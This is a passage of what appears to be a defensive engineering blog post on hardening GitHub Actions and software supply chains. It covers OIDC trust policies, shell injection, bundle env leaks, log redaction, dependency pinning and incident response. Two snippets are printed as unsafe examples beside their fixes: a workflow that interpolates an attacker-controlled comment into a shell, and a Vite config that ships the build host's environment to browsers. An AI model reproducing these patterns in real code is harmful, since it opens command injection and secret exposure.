&lt;p&gt;&lt;strong&gt;&lt;code&gt;pull_request_target&lt;/code&gt; is the single highest-severity GitHub Actions footgun.&lt;/strong&gt; Unlike &lt;code&gt;pull_request&lt;/code&gt;, it runs in the context of the base repository with the base repo's &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; and access to repository secrets. If you &lt;code&gt;actions/checkout&lt;/code&gt; the PR head, you've executed an attacker's code with privileged credentials. Default rule: never check out PR head code in a &lt;code&gt;pull_request_target&lt;/code&gt; workflow; never run third-party scripts inside one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Replace long-lived AWS keys with GitHub OIDC.&lt;/strong&gt; The role's trust policy restricts assumption to your repository's workflows; CI never holds a credential that survives the run. The footgun: a &lt;code&gt;sub&lt;/code&gt; condition like &lt;code&gt;repo:org/*:*&lt;/code&gt; hands AWS-role assumption to any workflow run from any branch, including a fork's PR. Anchor &lt;code&gt;sub&lt;/code&gt; to a specific repo + ref:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"Condition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringEquals"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringLike"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"repo:yourorg/yourrepo:ref:refs/heads/main"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For higher precision than &lt;code&gt;sub&lt;/code&gt;, use &lt;code&gt;job_workflow_ref&lt;/code&gt;: it constrains role assumption to a specific leaf workflow file and is resilient to a malicious reusable-workflow caller inside the same repo. AWS, GCP Workload Identity Federation, and Azure federated credentials all expose it.&lt;/p&gt;

&lt;p&gt;CI translations: GitLab CI uses &lt;code&gt;id_tokens:&lt;/code&gt; per-job and CI/CD job-token scope allowlists; Buildkite uses agent-queue ACLs and Vault Agent for secret distribution; CircleCI uses restricted contexts; Jenkins uses &lt;code&gt;withCredentials&lt;/code&gt; per-step plus folder-level credential isolation. Different YAML, same default-deny pattern.&lt;/p&gt;
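&lt;p&gt;As one concrete translation, the GitLab shape of per-job OIDC looks roughly like this (a sketch; the job name and &lt;code&gt;$AWS_ROLE_ARN&lt;/code&gt; variable are placeholders):&lt;/p&gt;

```yaml
# .gitlab-ci.yml sketch: per-job OIDC token instead of stored cloud keys
deploy:
  id_tokens:
    AWS_OIDC_TOKEN:            # exposed to the job as $AWS_OIDC_TOKEN
      aud: sts.amazonaws.com
  script:
    - >
      aws sts assume-role-with-web-identity
      --role-arn "$AWS_ROLE_ARN"
      --role-session-name ci
      --web-identity-token "$AWS_OIDC_TOKEN"
      --duration-seconds 900
```

&lt;p&gt;Jobs without an &lt;code&gt;id_tokens:&lt;/code&gt; block get no token at all, which is the same default-deny posture as &lt;code&gt;permissions: {}&lt;/code&gt;.&lt;/p&gt;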

&lt;h4&gt;
  
  
  Boundary 9: Untrusted input → Shell (CWE-78 in CI)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; GitHub-context fields like &lt;code&gt;github.event.comment.body&lt;/code&gt;, &lt;code&gt;pull_request.title&lt;/code&gt;, &lt;code&gt;head_ref&lt;/code&gt; are attacker-controlled. When interpolated directly into a &lt;code&gt;run:&lt;/code&gt; block, they become shell injection. The same class exists everywhere: GitLab &lt;code&gt;$CI_*&lt;/code&gt; from triggered events, Jenkins parameterised builds, Buildkite &lt;code&gt;meta-data&lt;/code&gt;, Azure &lt;code&gt;variables&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Unsafe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;BODY&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}&lt;/span&gt;
&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;$BODY"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the boundary the lede sat on. The fix was a four-line diff. The control that catches the next one (&lt;code&gt;actionlint&lt;/code&gt; for syntax + &lt;code&gt;zizmor&lt;/code&gt; for security patterns, both as required PR checks) was one commit. Cross-CI: &lt;code&gt;semgrep --config=p/ci&lt;/code&gt; covers most major vendors with one ruleset.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 3, runtime-side: what ships and what leaks
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; a &lt;code&gt;define&lt;/code&gt; block in your bundler (Vite, Webpack, esbuild, Rollup) that spreads &lt;code&gt;process.env&lt;/code&gt; into the client bundle. Frontend bundlers replace &lt;code&gt;process.env.X&lt;/code&gt; with the value at build time, so whatever was in the build host's env becomes a string literal in the JS shipped to every browser.&lt;/p&gt;

&lt;p&gt;We had this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// vite.config.ts&lt;/span&gt;
&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// TODO: fix this later&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env.PUBLIC_API_URL&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;PUBLIC_API_URL&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="c1"&gt;// explicit allowlist; nothing implicit&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same principle for &lt;code&gt;NEXT_PUBLIC_*&lt;/code&gt;, &lt;code&gt;VITE_*&lt;/code&gt;, &lt;code&gt;REACT_APP_*&lt;/code&gt;, and &lt;code&gt;EXPO_PUBLIC_*&lt;/code&gt;: treat any env var behind these prefixes as browser-readable, and never put secrets behind them. The same failure mode exists in mobile: Android &lt;code&gt;BuildConfig.API_KEY = "$apiKey"&lt;/code&gt; from a checked-in &lt;code&gt;gradle.properties&lt;/code&gt;; iOS API keys in &lt;code&gt;Info.plist&lt;/code&gt; or &lt;code&gt;xcconfig&lt;/code&gt;. Assume any string in the artefact is extractable.&lt;/p&gt;
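&lt;p&gt;A cheap post-build guard is to scan the emitted bundle for build-host env values before upload; a minimal sketch, where the prefix list and the &lt;code&gt;dist/&lt;/code&gt; glob are assumptions to tune:&lt;/p&gt;

```python
# Post-build leak check (sketch): fail the job if any build-host env value
# with a sensitive-looking prefix appears verbatim in the emitted JS bundle.
import os
import pathlib


def leaked_env_values(dist_dir, prefixes=("AWS_", "NPM_", "DATABASE_")):
    """Return (env var name, file path) pairs for values found in bundle files."""
    # Only consider values long enough to be unlikely as coincidental strings.
    values = {k: v for k, v in os.environ.items()
              if k.startswith(prefixes) and len(v) >= 8}
    leaks = []
    for path in pathlib.Path(dist_dir).rglob("*.js"):
        text = path.read_text(errors="ignore")
        leaks.extend((k, str(path)) for k, v in values.items() if v in text)
    return leaks
```

&lt;p&gt;Run it right after the build step and fail the pipeline when it returns anything; it complements, rather than replaces, the explicit &lt;code&gt;define&lt;/code&gt; allowlist.&lt;/p&gt;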

&lt;h4&gt;
  
  
  Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; logging frameworks default to verbose. CloudWatch, Datadog, Sentry retain log lines for weeks. A &lt;code&gt;console.log(req)&lt;/code&gt; in a request handler dumps the &lt;code&gt;Authorization&lt;/code&gt; header to a 30-day-retention log, accessible to any engineer with read access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; redaction at the framework level (not per call-site):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="nx"&gt;pino&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;pino&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;logger&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;pino&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;redact&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.cookie&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;config.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// catches Axios errors&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.password&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.token&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.secret&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="na"&gt;censor&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;[REDACTED]&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The one that bit us: AxiosError objects carry the original request configuration, including &lt;code&gt;Authorization&lt;/code&gt; headers. &lt;code&gt;logger.error(msg, axiosErr)&lt;/code&gt; without redaction quietly dumps every bearer token your service has ever forwarded.&lt;/p&gt;

&lt;p&gt;Every mature logger has the primitive: &lt;code&gt;structlog&lt;/code&gt; processors (Python), &lt;code&gt;logback&lt;/code&gt;'s &lt;code&gt;MaskingPatternLayout&lt;/code&gt; (Java), &lt;code&gt;zap&lt;/code&gt; / &lt;code&gt;zerolog&lt;/code&gt; field hooks (Go), &lt;code&gt;tracing&lt;/code&gt; field filters (Rust), &lt;code&gt;Rails.config.filter_parameters&lt;/code&gt; (Ruby), &lt;code&gt;Serilog.Enrichers.Sensitive&lt;/code&gt; (.NET). Last line of defence regardless of stack: an &lt;strong&gt;OpenTelemetry Collector&lt;/strong&gt; with an &lt;code&gt;attributes/delete&lt;/code&gt; processor that scrubs in transit before logs reach Datadog or CloudWatch.&lt;/p&gt;
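&lt;p&gt;The &lt;code&gt;structlog&lt;/code&gt; flavour of the same primitive can be sketched as a processor that scrubs by key name at any depth; the key list here is illustrative, not exhaustive:&lt;/p&gt;

```python
# structlog-shaped processor: (logger, method_name, event_dict) -> event_dict.
# Key names are illustrative; audit them against your real payload shapes.
SENSITIVE_KEYS = {"password", "token", "secret", "authorization", "cookie"}


def redact_processor(logger, method_name, event_dict):
    def scrub(obj):
        if isinstance(obj, dict):
            # Replace values for sensitive keys; recurse into everything else.
            return {k: "[REDACTED]" if k.lower() in SENSITIVE_KEYS else scrub(v)
                    for k, v in obj.items()}
        if isinstance(obj, list):
            return [scrub(v) for v in obj]
        return obj
    return scrub(event_dict)
```

&lt;p&gt;Registered early in the processor chain, it catches nested request objects the way the &lt;code&gt;pino&lt;/code&gt; paths above do, with the same caveat: it only knows the key names you gave it.&lt;/p&gt;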

&lt;p&gt;&lt;strong&gt;The limit.&lt;/strong&gt; &lt;code&gt;pino&lt;/code&gt; redact is a denylist; it only scrubs the paths you list. Custom auth headers (&lt;code&gt;x-api-key&lt;/code&gt;, &lt;code&gt;x-vault-token&lt;/code&gt;), GraphQL &lt;code&gt;variables.password&lt;/code&gt;, &lt;code&gt;request.body.token&lt;/code&gt;, and provider-specific shapes are easy to miss. Audit your redact paths against the actual headers and body shapes your services see, and re-audit when you add an integration.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; vulnerable transitive dependency, no maintainer response, can't wait.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; force-pin the transitive with documented rationale and an expiry date:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"overrides"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"lodash-es"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"4.17.23"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"tar"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"7.5.11"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every package manager has the primitive: npm &lt;code&gt;overrides&lt;/code&gt;, yarn &lt;code&gt;resolutions&lt;/code&gt;, pip &lt;code&gt;constraints.txt&lt;/code&gt;, Poetry direct-promotion, uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;, Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;, Gradle &lt;code&gt;resolutionStrategy.force&lt;/code&gt;, Cargo &lt;code&gt;[patch.crates-io]&lt;/code&gt;, Go &lt;code&gt;replace&lt;/code&gt;, Bundler direct gem pin, NuGet central package management.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Override-rot is real:&lt;/strong&gt; outdated overrides shadow newer transitive versions that already have the fix. Each override should reference its CVE, the introducing PR, and a re-evaluation date. The &lt;code&gt;audit-allowlist.json&lt;/code&gt; schema we use:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"ghsa"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"GHSA-xxxx-yyyy-zzzz"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"package"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"the affected package"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"severity"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"high | critical"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"rationale"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"why this risk is accepted (must explain reachability or absence of fix)"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"verified_by"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"engineer email or handle"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"added"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"expires"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;max&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;90&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;days&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"follow_up"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"what removes this entry"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;CI fails when &lt;code&gt;expires&lt;/code&gt; passes; the gate forces a re-decision rather than letting drift accumulate.&lt;/p&gt;
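&lt;p&gt;The gate itself is small. A sketch of the check, assuming the schema above; in CI you would call &lt;code&gt;sys.exit(gate())&lt;/code&gt; so an expired entry fails the job:&lt;/p&gt;

```python
# Expiry gate (sketch): fail CI when any allowlist entry is past its
# re-evaluation date. Field names match the audit-allowlist.json schema.
import datetime
import json
import sys


def expired_entries(allowlist, today=None):
    """Return entries whose 'expires' date (YYYY-MM-DD) has passed."""
    today = today or datetime.date.today()
    return [e for e in allowlist
            if datetime.date.fromisoformat(e["expires"]) < today]


def gate(path="audit-allowlist.json"):
    with open(path) as f:
        entries = json.load(f)
    stale = expired_entries(entries)
    for e in stale:
        print(f"EXPIRED: {e['ghsa']} ({e['package']}), re-decide or remove",
              file=sys.stderr)
    return 1 if stale else 0
```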




&lt;h2&gt;
  
  
  When prevention fails: the response side
&lt;/h2&gt;

&lt;p&gt;Every boundary above is preventive. Some will fail. The question is what you do in the next four hours.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Forensic record.&lt;/strong&gt; Retain CI build logs for at least 90 days, forwarded to an immutable sink (S3 with object lock, or a logging platform with retention). Without this, "did the malicious axios version run for us during the window?" is unanswerable. GitHub-hosted runners are ephemeral; once a job finishes, the host is gone. Pre-configure log shipping and an artifact upload of suspicious-run state.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Provenance lookup.&lt;/strong&gt; &lt;code&gt;rekor-cli search --artifact &amp;lt;digest&amp;gt;&lt;/code&gt; answers "did our pipeline sign this digest?" &lt;code&gt;gh attestation verify&lt;/code&gt; answers it for GitHub-attested artifacts. &lt;strong&gt;OSV-Scanner&lt;/strong&gt; retroactively queries your lockfile against advisory windows ("did we have axios 1.14.x in a build between March 30 12:00 UTC and 15:00 UTC?"). &lt;strong&gt;GUAC&lt;/strong&gt; (Graph for Understanding Artifact Composition) builds a queryable provenance graph across artifacts. &lt;strong&gt;Trivy&lt;/strong&gt; + &lt;strong&gt;Grype&lt;/strong&gt; drive SBOM-based scanning post-incident; &lt;strong&gt;Dependency-Track&lt;/strong&gt; is the consumption side. An SBOM you don't continuously diff against vulnerability feeds is a compliance artefact, not a control.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OIDC token revocation playbook.&lt;/strong&gt; Know how to invalidate cached OIDC subject claims. Know which AWS role trust policies to tighten. Know how to query Sigstore Rekor for "did we sign this digest during the suspect window?" All process documentation, not tooling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Secret rotation in dependency order.&lt;/strong&gt; If CI is suspect, rotation order matters. Start at the leaves (npm publish tokens, third-party SaaS keys), then deploy roles, then DB credentials. Rotating root credentials first invalidates the OIDC tokens you'd need to rotate the leaves. Document who calls whom; security incidents are a bad time to discover ambiguity.&lt;/p&gt;
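&lt;p&gt;"Who calls whom" can be written down as a graph and topologically sorted, so the rotation order is computed rather than remembered mid-incident. The credential names and edges here are hypothetical:&lt;/p&gt;

```python
# Hypothetical credential graph: each key maps to the credentials that must
# be rotated BEFORE it (leaves first, root last), because rotating the root
# first would invalidate the path used to rotate the leaves.
from graphlib import TopologicalSorter

rotate_before = {
    "npm_publish_token": set(),
    "saas_api_keys": set(),
    "deploy_role": {"npm_publish_token", "saas_api_keys"},
    "db_credentials": {"deploy_role"},
    "ci_oidc_root": {"db_credentials"},
}


def rotation_order(deps):
    """Leaves-first order; raises CycleError if the runbook contradicts itself."""
    return list(TopologicalSorter(deps).static_order())
```

&lt;p&gt;Keeping the graph in the runbook means adding a credential forces you to state its dependencies, and a contradictory ordering fails loudly instead of being discovered during an incident.&lt;/p&gt;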

&lt;p&gt;&lt;strong&gt;Image quarantine.&lt;/strong&gt; ECR lifecycle policy plus an admission-controller tag-block on the suspected window's digests. Until your &lt;code&gt;cosign verify&lt;/code&gt; says the digest you're running is the digest you signed, treat anything from that window as suspect.&lt;/p&gt;

&lt;p&gt;Prevention buys time for detection. Detection buys time for response. Get all three in writing before you need them.&lt;/p&gt;




&lt;h2&gt;
  
  
  What one week of focused work actually moved
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Third-party Action SHA pinning&lt;/td&gt;
&lt;td&gt;0% of 110 &lt;code&gt;uses:&lt;/code&gt; lines&lt;/td&gt;
&lt;td&gt;100% with &lt;code&gt;pinact&lt;/code&gt; CI gate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow &lt;code&gt;permissions: write-all&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;8 of 16 workflows&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lockfile integrity coverage&lt;/td&gt;
&lt;td&gt;99.97% (1 off-registry tarball, no &lt;code&gt;integrity:&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;99.97% + CI allowlist enforcement with rationale per off-registry entry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;12 hours&lt;/td&gt;
&lt;td&gt;3 days&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production Dockerfile USER directive&lt;/td&gt;
&lt;td&gt;0 of 7 (all root)&lt;/td&gt;
&lt;td&gt;7 of 7 (non-root)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production base image digest pinning&lt;/td&gt;
&lt;td&gt;0 of 7&lt;/td&gt;
&lt;td&gt;7 of 7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image signing&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;cosign keyless on every ECR push, workflow-path-anchored verify identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time secret scanning&lt;/td&gt;
&lt;td&gt;pre-commit only (skippable)&lt;/td&gt;
&lt;td&gt;pre-commit + CI (unskippable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time SAST&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CodeQL &lt;code&gt;security-extended&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
